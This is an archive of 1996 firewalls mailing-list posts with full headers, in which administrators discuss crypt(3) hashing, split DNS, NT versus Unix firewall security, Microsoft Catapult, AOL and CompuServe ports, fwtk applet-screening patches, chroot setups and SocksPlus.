> > > > I am trying to write some proggy that can let me create users thru email, > > I have so many by day!! I want to make this an automated process, > > and all I need now is to know the way this encryption is made. > > If that's really what you want to do, you don't need the algorithm, but > just have a look at crypt(3) on all (?) Un*x systems. Mike --- From firewalls-owner Tue Jul 2 10:19:38 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id JAA07252 for firewalls-outgoing; Tue, 2 Jul 1996 09:58:59 -0700 (PDT) Received: from imsc.ernet.in ([202.41.95.1]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id JAA07000 for ; Tue, 2 Jul 1996 09:57:32 -0700 (PDT) Received: from brahma.iitm.ernet.in by imsc.ernet.in (5.x/SMI-SVR4) Received: by brahma.iitm.ernet.in; (5.65/1.1.8.2/07Feb96-0917AM) Date: Tue, 2 Jul 1996 22:16:16 +0530 (IST) From: Natchu Vishnu Priya To: Lack Mr G M Cc: Dan Shadix Subject: Re: split-brain DNS In-Reply-To: <9607011204.ZM4779@ukwit01> Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Mon, 1 Jul 1996, Lack Mr G M wrote: > > Why can't you make the one master DNS server secondary for all your internal > sub-domains? Then if a request is for a domain for which it is authoritative, > it will just respond, if not then it will go to the Internet at large. > > Whereas this might work (ie. it sounds as though it will, but I haven't > thought it through completely) this would leave me with the master server being This will work... > authoritative for everything. This would push the size of its database up from > ca. 8000 to ca. 40000 entries (guessing here, but of that order). I don't have > the memory on the servers for such numbers. > That's bad. The point here is that since you are using a single machine to answer all of the firewall's queries it is likely to have a very very large cache.
Any connection from the firewall to an internal machine will make a query to this machine. If the TTL values are around a day (this is what they would be if you do not have a rather static DNS) then a large portion of the internal records are likely to be cached most of the time. This machine will also cache all the outgoing queries. So you need memory for such numbers anyway... > Also, it strikes me as being against the "spirit" of DNS. Relatively few > queries go "between" domains, so I don't want this master server to spend a lot > of its time doing zone queries for timestamps and frequent zone transfers just > for these. I just want to send the query off to the relevant server, just as > in the "full" InterNET. > > A logical extension of your solution would be to get all of the root name > servers to become secondaries for all domains, and I'm sure that we can agree > that would be a disaster! That would be a disaster... but no other solution seems to present itself.... unless you are willing to patch bind to do this. _______________________________________________________ Vishnu Priya Natchu System Administrator 225, Saraswathi, Network Systems Lab, IIT Madras 600 036 Computer Science & Engg.
INDIA IIT Madras 0091-044-235-1889 0091-044-235-1921 _______________________________________________________ Email: mailto:vishnu@brahma.iitm.ernet.in WWW page: http://brahma.iitm.ernet.in/~vishnu _______________________________________________________ From firewalls-owner Tue Jul 2 10:35:21 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id KAA11746 for firewalls-outgoing; Tue, 2 Jul 1996 10:31:28 -0700 (PDT) Received: from dfw-ix6.ix.netcom.com (dfw-ix6.ix.netcom.com [206.214.98.6]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id KAA11739 for ; Tue, 2 Jul 1996 10:31:20 -0700 (PDT) Received: from larry-s-pc (nyc-ny23-18.ix.netcom.com [206.214.136.82]) by dfw-ix6.ix.netcom.com (8.6.13/8.6.12) with SMTP id KAA23155 for ; Tue, 2 Jul 1996 10:28:38 -0700 Message-Id: <1.5.4.32.19960702172838.0066c644@popd.ix.netcom.com> X-Sender: ler@popd.ix.netcom.com X-Mailer: Windows Eudora Light Version 1.5.4 (32) Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Tue, 02 Jul 1996 13:28:38 -0400 To: firewalls@greatcircle.com From: Larry Rudnick Subject: Training duplicate Sender: firewalls-owner@GreatCircle.COM Precedence: bulk My apologies to the list for the duplicate posting. Larry Rudnick <<< ++++++++++ Larry Rudnick +++++++++++ >>> <<< ++++++ OppenheimerFunds, Inc. 
++++++ >>> <<< ++++++++ ler@ix.netcom.com +++++++++ >>> From firewalls-owner Tue Jul 2 11:04:10 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id KAA14994 for firewalls-outgoing; Tue, 2 Jul 1996 10:58:09 -0700 (PDT) Received: from gatekeeper.3Com.COM (gatekeeper.3Com.COM [129.213.128.5]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id KAA14974 for ; Tue, 2 Jul 1996 10:57:59 -0700 (PDT) Received: from manzanita.DEV.3Com.COM.noname (manzanita.DEV.3Com.COM) by gatekeeper.3Com.COM with SMTP id AA16415 Received: by manzanita.DEV.3Com.COM.noname (4.1/SMI-4.1) Date: Tue, 2 Jul 96 10:50:18 PDT From: bobk@manzanita.DEV.3Com.COM (Bob Konigsberg) Message-Id: <9607021750.AA00467@manzanita.DEV.3Com.COM.noname> To: cyberia@CAM.ORG Subject: Re: Training??? Cc: firewalls@GreatCircle.COM Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I'd recommend Learning Tree (1-800-THE-TREE). They have courses all over the place. I have no affiliation with them, but I've taken two of their courses (Windows NT Client/Server, and Internet Security) and been happy with both of them.
BobK From firewalls-owner Tue Jul 2 12:24:02 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id MAA21111 for firewalls-outgoing; Tue, 2 Jul 1996 12:07:47 -0700 (PDT) Received: from absolut-zero.winternet.com (absolut-zero.winternet.com [198.174.169.4]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id MAA21093 for ; Tue, 2 Jul 1996 12:07:38 -0700 (PDT) Received: from parka (dufresne@parka.winternet.com [198.174.169.9]) by absolut-zero.winternet.com (8.7.5/8.7.5) with ESMTP id OAA25400; Tue, 2 Jul 1996 14:04:30 -0500 (CDT) Received: (from dufresne@localhost) by parka (8.7.4/8.6.12) id OAA04622; Tue, 2 Jul 1996 14:04:29 -0500 (CDT) Posted-Date: Tue, 2 Jul 1996 14:04:29 -0500 (CDT) Date: Tue, 2 Jul 1996 14:04:29 -0500 (CDT) From: Ron DuFresne To: John Betts cc: David LeBlanc , firewalls@GreatCircle.COM Subject: Re: NT Backoffice "Catapult" firewall certified? In-Reply-To: <199607011443.QAA30859@rbit.co.za> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Mon, 1 Jul 1996, John Betts wrote: > % This isn't true. Guest doesn't have permissions to write the registry. > % Besides which, the first thing you do when setting up an NT machine is to > % disable guest. Somewhat like taking the + out of the rhosts file on a Sun. > % > > In my haste to clear my mailbox, I didn't give 100% truths. > > I didn't mean to imply that Guest could do _anything_ to the registry, > just some things (remotely). > > Not every person who puts NT boxes (or any other unix box for that matter) > on the Internet knows about things like disabling guest account, > setting permissions on shares correctly, etc. > > I am fairly sure that _MY_ nt box is fairly secure, but that's only > because I spent time going through anything that I could think of > to secure it.
> > My main point against NT firewalls is the following: > _as a general rule_ people who want NT firewalls, want them > because any tom, dick and harry can get them going, without > extensive knowledge of security and tcp/ip. > > I have no problem with firewalls that are so easy to administer, etc., > BUT, generally, the people who setup these easy-to-use firewalls, > don't know/think about things like disabling guest account > (I know, lame example), or setting permissions on shares (or disabling > all shares, or whatever), etc, and if the firewall software doesn't > do this for them, then their firewall host can be easily compromised.... > > It takes time and knowledge (well, more like common sense) to make an NT box > secure(ish). We all know that a large majority of ppl who insist on NT > because of its ease of use, and requirement for little to no knowledge > of system administration and security, don't have the time and knowledge > to secure their box. > > John, I think Russ was also trying to point out that the same applies to unix based systems as well. They aren't secure out of the box, it takes special expertise to secure them, and thus, there's nothing here that makes them really any different than a unix based system. The main point here being, don't let your OS religion color your judgement. Later, Ron Dufresne ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ "Cutting the space budget really restores my faith in humanity. It eliminates dreams, goals, and ideals and lets us get straight to the business of hate, debauchery, and self-annihilation." -- Johnny Hart ***testing, only testing, and damn good at it too!*** OK, so you're a Ph.D. Just don't touch anything.
From firewalls-owner Tue Jul 2 12:51:43 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id MAA23197 for firewalls-outgoing; Tue, 2 Jul 1996 12:47:07 -0700 (PDT) Received: from hp01.vak12ed.edu (hp01.vak12ed.edu [141.104.150.251]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id MAA23178 for ; Tue, 2 Jul 1996 12:47:01 -0700 (PDT) Message-Id: <199607021947.MAA23178@miles.greatcircle.com> Received: by hp01.vak12ed.edu From: "W.C. Epperson" Subject: Re: Catapault firewall To: firewalls@greatcircle.com Date: Tue, 02 Jul 1996 15:44:18 EDT In-Reply-To: <199607020139.VAA27764@explorer2.clark.net>; from "Marcus J. Ranum" at Jul 1, 96 9:39 pm X-Mailer: Elm [revision: 109.18] Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Marcus appears to have writ: [snip] > The brief on Microsoft's page is completely content-free. > Several times, Catapult is recommended as the solution because > it's secure. Nothing about why it's secure or how it's secure. > Don't bother your head with that stuff! It's SECURE, OK? > > ...Or at least as secure as a beta product that only > runs on a beta version of NT can be. > > In fairness to Microsoft, it may be pretty good stuff. > But we can't tell from what they say. Which is why I feel it > marks a milestone in the firewall market. The Big Boys Are Here > now and it's SECURE, it's OK. That argument worked for Netscape, > for a while. > > Those of us who've been with this firewall thing for > a while have seen the market get muddied before, and eventually > things calm down again. It'll be fascinating to see what > happens if Microsoft decides to put even a teeny bit of their > marketing muscle behind Catapult. I guess it means that, as > a technology, firewalls have "arrived." 
"To question all things; never to turn away from any difficulty; to accept no doctrine either from ourselves or from other people without a rigid scrutiny by negative criticism; letting no fallacy, or incoherence or confusion of thought, slip by unperceived; ...these are the lessons we learn from the ancient dialecticians."

First time I saw that, I thought Marcus had written it, but it's from John Stuart Mill.

While I don't agree that the Microsoft fluff represents a new trend (a certain _major_ router manufacturer has for some time touted their firewalling stuff with slides like "Unix: Wrong Choice for Firewalls" with no credible evidence that their product is better, only less well understood by the black hats), they may be the first fluffers on this scale in the firewalls market with the clout and credibility to pull it off.

Hmm, now that I look at it again, I guess Marcus' point is that the weighing in of a gorilla like Microsoft is a signal event of firewalls' arrival as a technology. I shudder to agree.

-- 
W.C. Epperson                       "I have great faith in fools.
Senior SE                            Self-confidence, my friends call it."
Information Security Officer                  --Edgar Allan Poe--
DBA Emeritus
Curmudgeon-for-Life
Virginia Dept. of Education
epperson@pen.k12.va.us

From firewalls-owner Tue Jul 2 13:04:04 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id MAA24176 for firewalls-outgoing; Tue, 2 Jul 1996 12:58:29 -0700 (PDT) Received: from relay1.smtp.psi.net (relay1.smtp.psi.net [38.8.14.2]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id MAA24127 for ; Tue, 2 Jul 1996 12:58:17 -0700 (PDT) Received: from adpmail.es.adp.com by relay1.smtp.psi.net (8.6.12/SMI-5.4-PSI) Received: from ccMail by adpmail.es.adp.com Mime-Version: 1.0 Date: Mon, 1 Jul 1996 16:02:06 -0500 Message-ID: <1d98ca00@es.adp.com> From: jorge_triana@es.adp.com (Jorge Triana) Subject: Re: AOL and Compuserve through f/wall To: Firewalls@GreatCircle.COM Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Content-Description: cc:Mail note part Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

Can somebody please tell me how to configure the firewall to get access to AOL and Compuserve...I have seen some msgs going back and forth here...but if anybody has specifics, I would appreciate it...

Let me know what I would have to configure as far as the firewall and the perimeter router...Thanks..

Jorge Triana
jorge_triana@es.adp.com

From firewalls-owner Tue Jul 2 13:35:43 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id NAA26372 for firewalls-outgoing; Tue, 2 Jul 1996 13:19:05 -0700 (PDT) Received: from neon.ingenia.com (neon.ingenia.com [205.207.219.29]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id NAA26330 for ; Tue, 2 Jul 1996 13:18:51 -0700 (PDT) Received: (from shaver@localhost) by neon.ingenia.com (8.8.Alpha.2/8.6.9) id QAA07528; Tue, 2 Jul 1996 16:15:58 -0400 From: Mike Shaver Message-Id: <199607022015.QAA07528@neon.ingenia.com> Subject: Re: Catapault firewall To: epperson@vak12ed.edu (W.C. Epperson) Date: Tue, 2 Jul 1996 16:15:57 -0400 (EDT) Cc: firewalls@GreatCircle.COM In-Reply-To: <199607021947.MAA23178@miles.greatcircle.com> from "W.C. Epperson" at Jul 2, 96 03:44:18 pm X-Mailer: ELM [version 2.4 PL24 PGP3 *ALPHA*] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

Thus spake W.C. Epperson:
> "To question all things; never to turn away from any difficulty; to
> accept no doctrine either from ourselves or from other people without
> a rigid scrutiny by negative criticism; letting no fallacy, or incoherence
> or confusion of thought, slip by unperceived; ...these are the lessons
> we learn from the ancient dialecticians." First time I saw that, I
> thought Marcus had written it, but it's from John Stuart Mill.

Marcus doesn't use semicolons. =)

> Hmm, now that I look at it again, I guess Marcus' point is that
> the weighing in of a gorilla like Microsoft is a signal event of
> firewalls' arrival as a technology. I shudder to agree.

And the fact that a company (even The Company) can reasonably hope to sell the product based on no factual description of its merits whatsoever.

Mike (`and I'd like it written in Java')
--
#> Mike Shaver (shaver@ingenia.com)      Ingenia Communications Corporation <#
#> Chief System Architect -- Head geek -- System exorcist                    <#
#>                                                                            <#
#> "Have you considered a life?  I hear they're quite affordable               <#
#>  these days."                                   --- shields@tembel.org     <#

From firewalls-owner Tue Jul 2 14:19:28 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id OAA01199 for firewalls-outgoing; Tue, 2 Jul 1996 14:13:33 -0700 (PDT) Received: from gatekeeper.3Com.COM (gatekeeper.3Com.COM [129.213.128.5]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id OAA01112 for ; Tue, 2 Jul 1996 14:12:24 -0700 (PDT) Received: from manzanita.DEV.3Com.COM.noname (manzanita.DEV.3Com.COM) by gatekeeper.3Com.COM with SMTP id AA21721 Received: by manzanita.DEV.3Com.COM.noname (4.1/SMI-4.1) Date: Tue, 2 Jul 96 13:58:42 PDT From: bobk@manzanita.DEV.3Com.COM (Bob Konigsberg) Message-Id: <9607022058.AA00541@manzanita.DEV.3Com.COM.noname> To: Firewalls@GreatCircle.COM, jorge_triana@es.adp.com Subject: Re: AOL and Compuserve through f/wall Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

AOL is port 5190 (server) and is found on the following IP subnets:

198.81.8.0
198.81.18.0
198.81.22.0

Compuserve is port 4144.

BobK

From firewalls-owner Tue Jul 2 17:22:04 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id RAA08587 for firewalls-outgoing; Tue, 2 Jul 1996 17:07:10 -0700 (PDT) Received: from kent.ansto.gov.au (kent.ansto.gov.au [137.157.45.204]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id RAA08559 for ; Tue, 2 Jul 1996 17:06:37 -0700 (PDT) Received: by kent.ansto.gov.au (8.7.5/1.51+ANSAMS) From: frank@ansto.gov.au (Frank Crawford) To: mike@networx.ie Cc: firewalls@GreatCircle.COM Date: Wed, 3 Jul 1996 09:55 EST Subject: Re: /etc/shadow encryption Content-Type: text/plain Message-ID: <31d9b8730.5ebc@kent.ansto.gov.au> Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

Michael Ryan writes:
> Forgive me if I'm wrong, but I believe the crypt() function is not
> exported outside the U.S. and I note the requestor is
> outside the U.S., so his Un*x probably doesn't have it.
In this case you are wrong, but are forgiven. The crypt program and other reversible encryption tools for Unix can't be exported, but the crypt routine (i.e. crypt(3)) is exportable, because it is a one-way "encryption" (i.e. you can't get the original info back). Frank Crawford From firewalls-owner Tue Jul 2 20:04:27 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id TAA15311 for firewalls-outgoing; Tue, 2 Jul 1996 19:55:45 -0700 (PDT) Received: from SantaClara01.pop.internex.net (SantaClara01.POP.InterNex.Net [205.158.3.18]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id TAA15304 for ; Tue, 2 Jul 1996 19:55:40 -0700 (PDT) From: carl@hdshq.com Received: from claunch.hdshq.com ([206.215.16.130]) Received: from [198.92.130.5] (claunch.hdshq.com [198.92.130.5]) by claunch.hdshq.com (1/HDS MAIL SYSTEM) with SMTP id SAA20024 for ; Tue, 2 Jul 1996 18:56:20 -0700 (PDT) Message-Id: <199607030156.SAA20024@claunch.hdshq.com> X-Sender: carl@lan.hdshq.com Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Tue, 2 Jul 1996 18:56:20 -0800 To: firewalls@greatcircle.com Subject: New version of Java, JavaScript, ActiveX screening http-gw patch Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I have posted the latest version of my patches to the TIS fwtk http-gw module, that provide site control over Java, JavaScript and/or ActiveX embedded in web pages. The patches exist for both http-gw V1.4 and http-gw V2.0alpha, and can be found at http://www.hdshq.com/fixes/fwtk/ The administrator can define global or per-client-host policies defining removal of these applets from the pages as they are browsed. In addition, this version allows the administrator to define browsers as safe for these applets based on the User-agent: header line automatically generated by browsers with each request. 
This allows the selective admission of applet types for browser releases the administrator deems "safe" while stripping the applets from web pages for all users of other browser versions/releases. ActiveX, the Microsoft extension of OLE (OCXs), will allow web pages to invoke application programs on the client PC. JavaScript is a web page scripting language which is mostly independent of Java. The code base for these context diffs is provided by Trusted Information Systems firewall toolkit (fwtk), which can be retrieved from ftp.tis.com The fwtk exists in both V1.3 and 2.0alpha version. The component http-gw of the fwtk is modified by these patches to provide the screening functionality. V1.3 http-gw must be upgraded first by the http-gw patches on ftp.tis.com, to reach the V1.4 base level upon which I built my patch. Carl V Claunch Hitachi Data Systems From firewalls-owner Tue Jul 2 21:19:02 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id VAA20264 for firewalls-outgoing; Tue, 2 Jul 1996 21:10:19 -0700 (PDT) Received: from andrew.cais.com (andrew.cais.com [199.0.216.215]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id VAA20254 for ; Tue, 2 Jul 1996 21:10:12 -0700 (PDT) Received: from pty.com (avatar.pty.com [206.49.54.2]) by andrew.cais.com (8.6.9/8.6.9) with ESMTP id AAA18873 for ; Wed, 3 Jul 1996 00:07:24 -0400 Received: by pty.com (SMI-8.6/SMI-SVR4) Message-Id: <199607021805.XAA08825@pty.com> Subject: Chrooted home directories ? To: firewalls@greatcircle.com Date: Tue, 2 Jul 1996 23:05:46 +0500 (GMT) From: felipe@avatar.pty.com (Ing. Felipe Tribaldos) X-URL: http://www.pty.com/ X-Mailer: ELM [version 2.4 PL23] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hello; Please reply directly by emails, as I'm on the digest list, and don't always get to it on a timely basis. 
Also, not entirely a firewall question, however it could be used on bastion hosts :-), so please forgive the noise.

I'm trying to create chrooted home directories to allow restricted shells and FTP on our system.

I created a user with a home directory /export/home/user. Then I copied /etc, /usr/bin and /usr/lib from the anon ftp directories. Also copied sh to /export/home/user/bin/sh

Then I created a script as follows, and set it as the user's shell:

/etc/chroot /export/home/user usr/bin/sh

This runs OK when I run it from the prompt as root, however when I try to login as the user I get a "chroot: not super-user" error. I tried setting the login script to owner root, and permission to u+s SUID, but that didn't work either.

TIA for any tips.

Felipe
-- 
___________________________________________________________________________
| Ing. Felipe Tribaldos                                                    |
| Gerente de Operaciones / Operations Manager   Tel. +(507)269-3571/223-5111|
| CyberMedia Panama                              Fax. +(507)264-6082        |
| Internet Access - Web Publishing               Res. +(507)269-7330        |
| url: http://www.pty.com/                       email: felipe@pty.com      |
|__________________________________________________________________________|

From firewalls-owner Wed Jul 3 01:49:09 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id BAA01990 for firewalls-outgoing; Wed, 3 Jul 1996 01:31:13 -0700 (PDT) Received: from lapsene.mii.lu.lv (lapsene.mii.lu.lv [159.148.60.2]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id BAA01972 for ; Wed, 3 Jul 1996 01:31:01 -0700 (PDT) Received: (from uulda@localhost) by lapsene.mii.lu.lv (8.7.5/8.7.1) id LAA04839 for firewalls@greatcircle.com; Wed, 3 Jul 1996 11:28:16 +0300 (EET DST) X-Authentication-Warning: lapsene.mii.lu.lv: uulda set sender to lda!lda.gov.lv!uldis@lda.gov.lv using -f >Received: by lda.gov.lv (UUPC/@ v5.00, 25Nov92); Received: from lda by lapsene.mii.lu.lv; Wed, 3 Jul 1996 11:28 EET Received: by lda.gov.lv (UUPC/@ v5.00, 25Nov92); Received: by lda.gov.lv (FIDO2UU 1.92d [DOS]); To: firewalls@greatcircle.com From: Uldis Bojars Message-Id: <31DA8200@lda.gov.lv> Subject: OS/2 firewalls? Date: Wed, 3 Jul 1996 10:21:52 +0200 Lines: 17 Content-Type: text Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

Hi!

I am searching for OS/2 firewalls - are there any? It's very hard to find, but I think there are some. Of course I do not want OS/2 because I want to use the firewall as a workstation ;-)

And - if negative - what are good firewalls for FreeBSD? Our company is not so big as to buy a Sun or HP UNIX computer and use it as a firewall.

Uldis

If you learn from mistakes, you will learn a lot today.
--- GoldED/386 3.00.Alpha1+

From firewalls-owner Wed Jul 3 03:49:04 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id DAA08200 for firewalls-outgoing; Wed, 3 Jul 1996 03:36:51 -0700 (PDT) Received: from lexicon.ins.com (lexicon.ins.com [199.0.193.11]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id DAA08192 for ; Wed, 3 Jul 1996 03:36:42 -0700 (PDT) Received: from user_ins.ins.com ([206.98.131.200]) by lexicon.ins.com (8.7.5/8.7.3) with SMTP id DAA26942; Wed, 3 Jul 1996 03:32:39 -0700 (PDT) Message-Id: <2.2.32.19960703223015.006c87fc@ins.com> X-Sender: martin_d@ins.com X-Mailer: Windows Eudora Pro Version 2.2 (32) Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Wed, 03 Jul 1996 18:30:15 -0400 To: jorge_triana@es.adp.com (Jorge Triana) From: Darwin Martinez Subject: Re: AOL and Compuserve through f/wall Cc: firewalls@greatcircle.com Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

For AOL, our firewall (FireWall-1) allows service 5190 (tcp) for AOL, and 4144 (tcp) for Compuserve from our internal net to the internet. Our external router (cisco 4500) has some access lists, but they are not as intensive as the rulebase in our firewall.

At 04:02 PM 7/1/96 -0500, you wrote:
>
>
>
> Can somebody please tell me how to configure the firewall to get
> access to AOL and Compuserve...I have seen some msgs going back and
> forth here...but if anybody has specifics, I would appreciate it...
>
> Let me know what I would have to configure as far as the firewall and
> the perimeter router...Thanks..
>
> Jorge Triana
> jorge_triana@es.adp.com
>
>
>
------------------------------------------------------------------------
Darwin L. Martinez                    Email: darwin_martinez@ins.com
Network Systems Engineer              Site #: 404-843-5954
International Network Services        Pager: 800-INS-1-INS
Atlanta Office
"The God that gave us life gave us liberty at the same time."
Thomas Jefferson ------------------------------------------------------------------------ From firewalls-owner Wed Jul 3 04:34:00 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id EAA10332 for firewalls-outgoing; Wed, 3 Jul 1996 04:24:46 -0700 (PDT) Received: from mail.rc.toronto.on.ca ([207.6.29.231]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id EAA10317 for ; Wed, 3 Jul 1996 04:24:39 -0700 (PDT) Received: from rwcooper.rc.toronto.on.ca ([207.6.29.232]) Received: by rwcooper.rc.toronto.on.ca with Microsoft Mail Message-ID: <01BB68AF.B7985580@rwcooper.rc.toronto.on.ca> From: Russ To: "'Firewalls'" Subject: NEC SocksPlus?? Date: Wed, 3 Jul 1996 07:17:37 -0400 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I received the following recently and would appreciate comments from the collective mind... About SOCKS and SocksPlus ------------------------- SOCKS is widely recognized as the de facto standard for Internet proxy firewalls; SocksPlus from NEC is the first commercial implementation of that standard. NEC has been the steward of the publicly available free version of SOCKS since 1993, managing the FTP site where SOCKS source code is available and administering the SOCKS mailing list where users of non-commercial SOCKS trade notes on solving problems concerning SOCKS security, configuration and compatibility. SocksPlus server software is used for all outbound connections in NEC's new turnkey PrivateNet firewall server. SocksPlus contains no original SOCKS source code, but is backward-compatible with the existing installed base of version 4.2 of SOCKS. SocksPlus provides significant improvements over non-commercial SOCKS. The code has been broken into modules and thoroughly tested for added security and easy extensibility. It supports UDP applications and server-to-server encrypted communications, and the configuration files have been completely revised to make them straightforward and intuitive. 
http://www.privatenet.nec.com Cheers, Russ From firewalls-owner Wed Jul 3 04:49:15 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id EAA11113 for firewalls-outgoing; Wed, 3 Jul 1996 04:44:06 -0700 (PDT) Received: from cheops.anu.edu.au (cheops.anu.edu.au [150.203.76.24]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id EAA11099 for ; Wed, 3 Jul 1996 04:43:58 -0700 (PDT) Message-Id: <199607031143.EAA11099@miles.greatcircle.com> Received: by cheops.anu.edu.au From: Darren Reed Subject: Re: NEC SocksPlus?? To: Russ.Cooper@RC.Toronto.on.ca (Russ) Date: Wed, 3 Jul 1996 21:41:09 +1000 (EST) Cc: firewalls@GreatCircle.COM In-Reply-To: <01BB68AF.B7985580@rwcooper.rc.toronto.on.ca> from "Russ" at Jul 3, 96 07:17:37 am X-Mailer: ELM [version 2.4 PL23] Content-Type: text Sender: firewalls-owner@GreatCircle.COM Precedence: bulk In some mail from Russ, sie said: [...] > SocksPlus server software is used for all outbound connections in NEC's new > turnkey PrivateNet firewall server. SocksPlus contains no original SOCKS [...] Can you explain how the term "turnkey" applies to this product ? If I turn the key one way, I get a secure network (where nobody can access the Internet without my saying-so), but if I turn it the other, I get an insecure network (and everyone can use the Internet for anything) ? 
Thanks, Darren From firewalls-owner Wed Jul 3 05:04:00 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id EAA10960 for firewalls-outgoing; Wed, 3 Jul 1996 04:39:59 -0700 (PDT) Received: from gate.personal-media.co.jp (gate.personal-media.co.jp [202.218.93.10]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id EAA10953 for ; Wed, 3 Jul 1996 04:39:51 -0700 (PDT) Received: (from uucp@localhost) by gate.personal-media.co.jp (8.7.4/3.3W5-gate-mx) id UAA13870 for ; Wed, 3 Jul 1996 20:33:16 +0900 (JST) Received: from sun00(192.9.200.6) by sparc11 via smap (V1.3) Received: from sparc18.sun00net (sparc18 [192.9.200.18]) by sun00.personal-media.co.jp (8.7.5 sendmail.nomx/3.3W5-sun00) with SMTP id UAA26830 for ; Wed, 3 Jul 1996 20:31:25 +0900 (JST) Received: by sparc18.sun00net (4.1/SMI-4.1) Date: Wed, 3 Jul 96 20:31:20 JST From: ishikawa@sparc18.personal-media.co.jp (Chiaki Ishikawa) Message-Id: <9607031131.AA05717@sparc18.sun00net> To: Firewalls@GreatCircle.COM In-Reply-To: <199607030306.UAA15586@miles.greatcircle.com> (firewalls-digest-owner@GreatCircle.COM) Subject: udp 137 broadcast from Win95 PC Reply-To: ishikawa@personal-media.co.jp Sender: firewalls-owner@GreatCircle.COM Precedence: bulk PMC e-mail id: 4579 Hello. Recently, I found that a Windows-95 PC located in our DMZ broadcast udp (port=137) packets in DMZ, which subsequently showed up in CISCO router log file. Below is a summary produced from the cisco log for one day. >UDP: src=xxx.yyy.zzz.54(137), dst=xxx.yyy.zzz.255(137), length=58 3 times >UDP: src=xxx.yyy.zzz.54(137), dst=xxx.yyy.zzz.255(137), length=76 162 times **** culprit win 95 PC **** I looked up UDP 137 in some textbooks on TCP/IP and found no reference to the number 137. Can this safely be ignored? -- Ishikawa, Chiaki ishikawa@personal-media.co.jp (family name, given name) Personal Media Corp. 
Shinagawa, Tokyo, Japan 142

From firewalls-owner Wed Jul 3 05:34:05 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id FAA14743 for firewalls-outgoing; Wed, 3 Jul 1996 05:22:40 -0700 (PDT) Received: from www ([206.249.80.2]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id FAA14725 for ; Wed, 3 Jul 1996 05:22:32 -0700 (PDT) Received: by www (SMI-8.6/SMI-SVR4) Date: Wed, 3 Jul 1996 05:18:20 -0700 (PDT) From: "Michael A. Galati - Information Services" X-Sender: mgalati@www To: firewalls@greatcircle.com Subject: NTP & DG/UX Systems Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

I realize this may not be the correct mailing list for this type of question, so if someone knows of one please mail back. Thank you in advance..

The question - We have a need to have NTP with authentication running for our DG/UX systems for an application which requires it. The problem, at least with the people we have contacted at DG, is they know of no way to set it up in this mode. I was referred to RFC 1305 which deals with NTP, very interesting reading, which left me very lost. I am not a unix giant by any means, but am willing to learn. I was able to figure out the cisco part without much trouble.

That said, is there anyone who has had success with this??

Again Thank You....

Mike Galati
Information Services
William Beaumont Hospital
